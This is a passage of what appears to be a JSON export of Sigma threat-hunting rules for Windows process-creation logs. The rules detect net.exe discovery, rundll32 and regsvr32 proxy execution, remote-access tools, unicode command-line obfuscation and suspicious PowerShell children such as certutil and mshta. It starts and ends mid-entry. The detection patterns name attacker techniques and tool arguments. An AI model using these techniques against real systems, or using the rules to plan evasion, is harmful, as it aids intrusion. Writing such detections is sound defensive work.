    "content": "title: CodePage Modification Via MODE.COM\nid: d48c5ffa-3b02-4c0f-9a9e-3c275650dd0e\nrelated:\n    - id: 12fbff88-16b5-4b42-9754-cd001a789fb3\n      type: derived\nstatus: test\ndescription: |\n    Detects a CodePage modification using the \"mode.com\" utility.\n    This behavior has been used by threat actors behind Dharma ransomware.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode\n    - https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html\n    - https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior\nauthor: Nasreddine Bencherchali (Nextron Systems), Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-01-19\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mode.com'\n        - OriginalFileName: 'MODE.COM'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' con '\n            - ' cp '\n            - ' select='\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_net_execution.yml",
    "content": "title: Net.EXE Execution\nid: 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac\nstatus: test\ndescription: Detects execution of \"Net.EXE\".\nreferences:\n    - https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/\n    - https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html\n    - https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html\n    - https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe\nauthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)\ndate: 2019-01-16\nmodified: 2022-07-11\ntags:\n    - attack.discovery\n    - attack.t1007\n    - attack.t1049\n    - attack.t1018\n    - attack.t1135\n    - attack.t1201\n    - attack.t1069.001\n    - attack.t1069.002\n    - attack.t1087.001\n    - attack.t1087.002\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.s0039\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' accounts'\n            - ' group'\n            - ' localgroup'\n            - ' share'\n            - ' start'\n            - ' stop '\n            - ' user'\n            - ' view'\n    condition: all of selection_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_net_quic.yml",
    "content": "title: SMB over QUIC Via Net.EXE\nid: 2238d337-42fb-4971-9a68-63570f2aede4\nrelated:\n    - id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae\n      type: similar\nstatus: test\ndescription: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md\n    - https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/\nauthor: frack113\ndate: 2023-07-21\ntags:\n    - attack.lateral-movement\n    - attack.t1570\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains: '/TRANSPORT:QUIC'\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_office_svchost_parent.yml",
    "content": "title: Suspicious New Instance Of An Office COM Object\nid: 9bdaf1e9-fdef-443b-8081-4341b74a7e28\nstatus: test\ndescription: |\n    Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\n    This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic\n    - https://github.com/med0x2e/vba2clr\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-13\nmodified: 2023-12-19\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\svchost.exe'\n        Image|endswith:\n            - '\\eqnedt32.exe'\n            - '\\excel.exe'\n            - '\\msaccess.exe'\n            - '\\mspub.exe'\n            - '\\powerpnt.exe'\n            - '\\visio.exe'\n            - '\\winword.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of office automation via scripting\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml",
    "content": "title: Unusually Long PowerShell CommandLine\nid: d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6\nstatus: test\ndescription: Detects unusually long PowerShell command lines with a length of 1000 characters or more\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020-10-06\nmodified: 2023-04-14\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_powershell:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n        - Description: 'Windows Powershell'\n        - Product: 'PowerShell Core 6'\n    selection_length:\n        CommandLine|re: '.{1000,}'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_powershell_crypto_namespace.yml",
    "content": "title: Invocation Of Crypto-Classes From The \"Cryptography\" PowerShell Namespace\nid: ad856965-f44d-42a8-945e-bbf7bd03d05a\nstatus: test\ndescription: |\n    Detects the invocation of PowerShell commands with references to classes from the \"System.Security.Cryptography\" namespace.\n    The PowerShell namespace \"System.Security.Cryptography\" provides classes for on-the-fly encryption and decryption.\n    These can be used for example in decrypting malicious payload for defense evasion.\nreferences:\n    - https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0\n    - https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html\n    - https://www.virustotal.com/gui/file/39102fb7bb6a74a9c8cb6d46419f9015b381199ea8524c1376672b30fffd69d2\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-12-01\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1027.010\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cmdlet_namespace:\n        CommandLine|contains: 'System.Security.Cryptography.'\n    selection_cmdlet_classes:\n        CommandLine|contains:\n            - '.AesCryptoServiceProvider'\n            - '.DESCryptoServiceProvider'\n            - '.DSACryptoServiceProvider'\n            - '.RC2CryptoServiceProvider'\n            - '.Rijndael'\n            - '.RSACryptoServiceProvider'\n            - '.TripleDESCryptoServiceProvider'\n    condition: all of selection_*\nfalsepositives:\n    - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_powershell_import_module.yml",
    "content": "title: Import New Module Via PowerShell CommandLine\nid: 4ad74d01-f48c-42d0-b88c-b31efa4d2262\nstatus: test\ndescription: Detects usage of the \"Import-Module\" cmdlet in order to add new Cmdlets to the current PowerShell session\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.3\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-5.1\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-09\nmodified: 2023-12-01\ntags:\n    - attack.execution\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cmdlet:\n        CommandLine|contains:\n            - 'Import-Module '\n            - 'ipmo '\n    filter_main_vsstudio:\n        ParentImage|contains:\n            - ':\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_'\n            - ':\\Windows\\System32\\cmd.exe'\n        CommandLine|contains|all:\n            - ':\\Program Files\\Microsoft Visual Studio\\'\n            - 'Tools\\Microsoft.VisualStudio.DevShell.dll'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Depending on the environement, many legitimate scripts will import modules inline. This rule is targeted for hunting purposes.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_powershell_new_netfirewallrule_allow.yml",
    "content": "title: New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet\nid: 51483085-0cba-46a8-837e-4416496d6971\nrelated:\n    - id: 8d31dd2e-b582-48ca-826e-dcaa2c1ca264\n      type: similar\nstatus: test\ndescription: |\n    Detects calls to the \"New-NetFirewallRule\" cmdlet from PowerShell in order to add a new firewall rule with an \"Allow\" action.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule\n    - https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170\n    - https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/\nauthor: frack113\ndate: 2024-05-03\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_name:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\powershell_ise.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_args:\n        CommandLine|contains|all:\n            - 'New-NetFirewallRule '\n            - ' -Action '\n            - 'allow'\n    condition: all of selection_*\nfalsepositives:\n    - Administrator script\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_powershell_susp_child_processes.yml",
    "content": "title: Potentially Suspicious PowerShell Child Processes\nid: e4b6d2a7-d8a4-4f19-acbd-943c16d90647\nstatus: test\ndescription: |\n    Detects potentially suspicious child processes spawned by PowerShell.\n    Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.\nreferences:\n    - https://twitter.com/ankit_anubhav/status/1518835408502620162\nauthor: Florian Roth (Nextron Systems), Tim Shelton\ndate: 2022-04-26\nmodified: 2024-07-16\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Image|endswith:\n            - '\\bash.exe'\n            - '\\bitsadmin.exe'\n            - '\\certutil.exe'\n            - '\\cscript.exe'\n            - '\\forfiles.exe'\n            - '\\hh.exe'\n            - '\\mshta.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\schtasks.exe'\n            - '\\scrcons.exe'\n            - '\\scriptrunner.exe'\n            - '\\sh.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n    filter_optional_amazon:\n        ParentCommandLine|contains: '\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\'  # AWS Workspaces\n        CommandLine|contains: '\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\'  # AWS Workspaces\n    filter_main_certutil_verify_store:\n        Image|endswith: '\\certutil.exe'\n        CommandLine|contains: '-verifystore '\n    filter_main_wmic:\n        Image|endswith: '\\wmic.exe'\n        CommandLine|contains:\n            - 'qfe list'\n            - 'diskdrive '\n            - 'csproduct '\n            - 'computersystem '\n            - ' os '\n            - ''\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - False positives are to be expected from PowerShell scripts that might make use of additional binaries such as \"mshta\", \"bitsadmin\", etc. Apply additional filters for those scripts.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml",
    "content": "title: Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly\nid: ce2c44b5-a6ac-412a-afba-9e89326fa972\nrelated:\n    - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e\n      type: similar\nstatus: test\ndescription: |\n    Detects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location.\n    When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'.\nreferences:\n    - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/\n    - https://www.virustotal.com/gui/file/288fc4f954f98d724e6fab32a89477943df5c0e9662cb199a19b90ae0c63aebe/detection\n    - https://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver\n    - https://ss64.com/nt/regsvr32.html\nauthor: Andreas Braathen (mnemonic.io), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-17\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_image:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: 'REGSVR32.EXE'\n    selection_cmdline:\n        CommandLine|contains:\n            - ' /s '\n            - ' /e '\n    filter_main_paths:\n        - CommandLine|contains:\n              - ':\\Program Files (x86)'\n              - ':\\Program Files\\'\n              - ':\\Windows\\System32\\'\n              - ':\\Windows\\SysWOW64\\'\n        - CurrentDirectory|contains:\n              - ':\\Program Files (x86)'\n              - ':\\Program Files\\'\n              - ':\\Windows\\System32\\'\n              - ':\\Windows\\SysWOW64\\'\n    filter_main_other_flags:\n        # Note: We filter other flags to keep the logic of the rule\n        CommandLine|contains:\n            - ' /i:'\n            - '/U '\n    filter_main_rpcproxy:\n        ParentCommandLine|endswith: ':\\Windows\\System32\\RpcProxy\\RpcProxy.dll'\n        CommandLine: 'regsvr32 /s rpcproxy.dll'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate usage as part of application installation, but less likely from e.g. temporary paths.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_remote_access_tools_action1_code_exec_and_remote_sessions.yml",
    "content": "title: Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions\nid: aa3168fb-d594-4f93-a92d-7a9ba675b766\nstatus: test\ndescription: |\n    Detects the execution of Action1 in order to execute arbitrary code or establish a remote session.\n\n    Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries.\n    Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed.\n\n    Hunting Opportunity 1- Weed Out The Noise\n\n    When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through  a policy with name \"test_app_1\":\n\n    ParentCommandLine: \"C:\\WINDOWS\\Action1\\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0\"\n\n    After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences.\n\n    Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours\n\n    If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity.\nreferences:\n    - https://twitter.com/Kostastsale/status/1646256901506605063?s=20\n    - https://www.action1.com/documentation/\nauthor: '@kostastsale'\ndate: 2023-04-13\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_app_deployment_exec:\n        ParentImage|endswith: '\\action1_agent.exe'\n        Image|contains: '\\Windows\\Action1\\package_downloads\\'\n    selection_command_exec:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n        ParentCommandLine|contains:\n            - '\\Action1\\scripts\\Run_Command_'\n            - '\\Action1\\scripts\\Run_PowerShell_'\n    selection_remote_session_init:\n        Image|endswith: '\\agent1_remote.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - If Action1 is among the approved software in your environment, you might find that this is a noisy query. See description for ideas on how to alter this query and start looking for suspicious activities.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_remote_access_tools_ammyy_admin_execution.yml",
    "content": "title: Remote Access Tool - Ammy Admin Agent Execution\nid: 7da7809e-f3d5-47a3-9d5d-fc9d019caf14\nstatus: test\ndescription: Detects the execution of the Ammy Admin RMM agent for remote management.\nreferences:\n    - https://www.ammyy.com/en/admin_features.html\nauthor: '@kostastsale'\ndate: 2024-08-05\ntags:\n    - attack.execution\n    - attack.persistence\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains: 'AMMYY\\aa_nts.dll\",run'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Ammy Admin RMM agent for remote management by admins.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_remote_access_tools_anyviewer_shell_exec.yml",
    "content": "title: Remote Access Tool - Cmd.EXE Execution via AnyViewer\nid: bc533330-fc29-44c0-b245-7dc6e5939c87\nstatus: test\ndescription: |\n    Detects execution of \"cmd.exe\" via the AnyViewer RMM agent on a remote management sessions.\nreferences:\n    - https://www.anyviewer.com/help/remote-technical-support.html\nauthor: '@kostastsale'\ndate: 2024-08-03\ntags:\n    - attack.execution\n    - attack.persistence\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\AVCore.exe'\n        ParentCommandLine|contains: 'AVCore.exe\" -d'\n        Image|endswith: '\\cmd.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use for admin activity.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_child_proc.yml",
    "content": "title: Remote Access Tool - ScreenConnect Remote Command Execution - Hunting\nid: d1a401ab-8c47-4e86-a7d8-2460b6a53e4a\nrelated:\n    - id: b1f73849-6329-4069-bc8f-78a604bb8b23\n      type: derived\n    - id: 7b582f1a-b318-4c6a-bf4e-66fe49bf55a5\n      type: derived\nstatus: test\ndescription: |\n    Detects remote binary or command execution via the ScreenConnect Service.\n    Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect\nreferences:\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-23\nmodified: 2024-02-26\ntags:\n    - attack.execution\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\ScreenConnect.ClientService.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate commands launched from ScreenConnect will also trigger this rule. Look for anomalies.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_rundll32_by_ordinal.yml",
    "content": "title: DLL Call by Ordinal Via Rundll32.EXE\nid: e79a9e79-eb72-4e78-a628-0e7e8f59e89c\nstatus: stable\ndescription: Detects calls of DLLs exports by ordinal numbers via rundll32.dll.\nreferences:\n    - https://web.archive.org/web/20200530031906/https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/\n    - https://github.com/Neo23x0/DLLRunner\n    - https://twitter.com/cyb3rops/status/1186631731543236608\n    - https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-22\nmodified: 2024-07-16\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - ',#'\n            - ', #'\n            - '.dll #'  # Sysmon removes , in its log\n            - '.ocx #'  # HermeticWizard\n    filter_optional_edge:\n        CommandLine|contains|all:\n            - 'EDGEHTML.dll'\n            - '#141'\n    filter_optional_vsbuild_dll:\n        ParentImage|contains:\n            - '\\Msbuild\\Current\\Bin\\'\n            - '\\VC\\Tools\\MSVC\\'\n            - '\\Tracker.exe'\n        CommandLine|contains:\n            - '\\FileTracker32.dll,#1'\n            - '\\FileTracker32.dll\",#1'\n            - '\\FileTracker64.dll,#1'\n            - '\\FileTracker64.dll\",#1'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment.\n    - Windows control panel elements have been identified as source (mmc).\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_rundll32_dllregisterserver.yml",
    "content": "title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly\nid: d81a9fc6-55db-4461-b962-0e78fea5b0ad\nrelated:\n    - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed # Renamed rundll32\n      type: similar\nstatus: test\ndescription: |\n    Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.\nreferences:\n    - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/\n    - https://www.virustotal.com/gui/file/94816439312563db982cd038cf77cbc5ef4c7003e3edee86e2b0f99e675ed4ed/behavior\n    - https://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-10-17\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_image:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cmdline:\n        CommandLine|contains: 'DllRegisterServer'\n    filter_main_legit_paths:\n        CommandLine|contains:\n            - ':\\Program Files (x86)'\n            - ':\\Program Files\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate usage as part of application installation, but less likely from e.g. temporary paths.\n    - Not every instance is considered malicious, but this rule will capture the malicious usages.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_sc_query.yml",
    "content": "title: SC.EXE Query Execution\nid: 57712d7a-679c-4a41-a913-87e7175ae429\nstatus: test\ndescription: Detects execution of \"sc.exe\" to query information about registered services on the system\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery\nauthor: frack113\ndate: 2021-12-06\nmodified: 2024-02-08\ntags:\n    - attack.discovery\n    - attack.t1007\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\sc.exe'\n        OriginalFileName: 'sc.exe'\n    selection_cli:\n        CommandLine|contains: ' query'\n    filter_optional_keybase:\n        CommandLine: 'sc query dokan1'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate query of a service by an administrator to get more information such as the state or PID\n    - Keybase process \"kbfsdokan.exe\" query the dokan1 service with the following commandline \"sc query dokan1\"\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_schtasks_creation_from_susp_parent.yml",
    "content": "title: Scheduled Task Creation From Potential Suspicious Parent Location\nid: 9494479d-d994-40bf-a8b1-eea890237021\nstatus: test\ndescription: |\n    Detects the execution of \"schtasks.exe\" from a parent that is located in a potentially suspicious location.\n    Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.\nreferences:\n    - https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-23\nmodified: 2024-05-13\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1053.005\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|contains:\n            - ':\\Temp\\'\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Temporary Internet'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains: '/Create '\n    filter_optional_common:\n        CommandLine|contains:\n            - 'update_task.xml'\n            - 'unattended.ini'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Software installers that run from temporary folders and also install scheduled tasks\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml",
    "content": "title: Potential CommandLine Obfuscation Using Unicode Characters\nid: e0552b19-5a83-4222-b141-b36184bb8d79\nrelated:\n    - id: 584bca0f-3608-4402-80fd-4075ff6072e3\n      type: similar\n    - id: ad691d92-15f2-4181-9aa4-723c74f9ddc3 # RTLO\n      type: similar\n    - id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9\n      type: obsolete\nstatus: test\ndescription: |\n    Detects potential CommandLine obfuscation using unicode characters.\n    Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\nreferences:\n    - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2022-01-15\nmodified: 2024-09-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # spacing modifier letters that get auto-replaced\n            - 'ˣ' # 0x02E3\n            - '˪' # 0x02EA\n            - 'ˢ' # 0x02E2\n            # Forward slash alternatives\n            - '∕' # 0x22FF\n            - '⁄' # 0x206F\n            # Hyphen alternatives\n            - '―' # 0x2015\n            - '—' # 0x2014\n            # Whitespace that don't work as path separator\n            - ' ' # 0x00A0\n            # Other\n            - '¯'\n            - '®'\n            - '¶'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_compression_params.yml",
    "content": "title: Potentially Suspicious Compression Tool Parameters\nid: 27a72a60-7e5e-47b1-9d17-909c9abafdcd\nstatus: test\ndescription: Detects potentially suspicious command line arguments of common data compression tools\nreferences:\n    - https://twitter.com/SBousseaden/status/1184067445612535811\nauthor: Florian Roth (Nextron Systems), Samir Bousseaden\ndate: 2019-10-15\nmodified: 2023-08-29\ntags:\n    - attack.collection\n    - attack.t1560.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName:\n            - '7z*.exe'\n            - '*rar.exe'\n            - '*Command*Line*RAR*'\n        CommandLine|contains:\n            - ' -p'\n            - ' -ta'\n            - ' -tb'\n            - ' -sdel'\n            - ' -dw'\n            - ' -hp'\n    filter_main_generic:\n        ParentImage|contains:\n            - ':\\Program Files\\'\n            - ':\\Program Files (x86)\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_elevated_system_shell.yml",
